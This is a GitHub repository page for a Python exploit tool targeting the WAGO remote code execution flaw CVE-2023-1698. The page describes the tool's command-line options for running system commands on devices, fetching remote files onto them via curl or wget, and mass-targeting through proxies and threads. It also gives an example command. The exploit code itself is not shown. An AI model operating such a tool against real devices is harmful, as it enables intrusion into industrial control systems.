Skip to content

thedarknessdied/WAGO-CVE-2023-1698

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
WAGO-CVE-2023-1698 .py
WAGO-CVE-2023-1698 .py
 
 
requirements.txt
requirements.txt
 
 
user_agent.py
user_agent.py
 
 

Repository files navigation

WAGO-CVE-2023-1698

WAGO系统远程代码执行漏洞(CVE-2023-1698)

Attention

I have developed a tool for local testing and POC development, which is for technical learning reference only. Please do not use it for illegal purposes. Any direct or indirect consequences and losses caused by individuals or organizations using the information provided in this article are the responsibility of the user themselves and have nothing to do with the author!!!

image

Description

WAGO is a company specializing in electrical interconnection, automation, and interface electronic technology. In multiple products of WAGO, a vulnerability allows unauthenticated remote attackers to create new users and change device configurations, which may lead to remote RCE, denial of service, and damage to the entire system.

installation

pip install -r requirements.txt

Tools Usage

python "WAGO-CVE-2023-1698 .py" -h
usage: WAGO-CVE-2023-1698 .py [-h] (-u URL | -f FILE)
                              [--remote-file-include REMOTE_FILE_INCLUDE | --local-file-include LOCAL_FILE_INCLUDE | --remote-command REMOTE_COMMAND]
                              [--random-agent RANDOM_AGENT] [-d DELAY] [-t THREAD] [--proxy PROXY] [--type TYPE] [-o OUTPUT]

WAGO System Remote Code Execution Vulnerability (CVE-2023-1698)

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Enter target object
  -f FILE, --file FILE  Input target object file
  --remote-file-include REMOTE_FILE_INCLUDE
                        Enter the filepath(it must be On the public network)
  --local-file-include LOCAL_FILE_INCLUDE
                        Enter the filepath(it must be On the local)
  --remote-command REMOTE_COMMAND
                        Enter the command you want to execute
  --random-agent RANDOM_AGENT
                        Using random user agents
  -d DELAY, --delay DELAY
                        Set multi threaded access latency (setting range from 0 to 5)
  -t THREAD, --thread THREAD
                        Set the number of program threads (setting range from 1 to 50)
  --proxy PROXY         Set up the proxy
  --type TYPE           Set up the remote upload file type
  -o OUTPUT, --output OUTPUT
                        output filename

Params

--remote-file-include,指定远程文件URL,会通过curl或者wget将文件上传到tmp目录或者当前目录, Specify a remote file URL, which will upload the file to the tmp directory or current directory through curl or wget --local-file-include,解析本地的shell脚本文件并在远端执行,Parse local shell script files and execute them remotely --remote-command REMOTE 执行一条系统命令,Execute a system command

Example

python wago.py -u ** --proxy http://127.0.0.1:10809 --remote-command "cat /var/log/wago"

About

WAGO系统远程代码执行漏洞(CVE-2023-1698)

Resources

Readme

License

MIT license
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages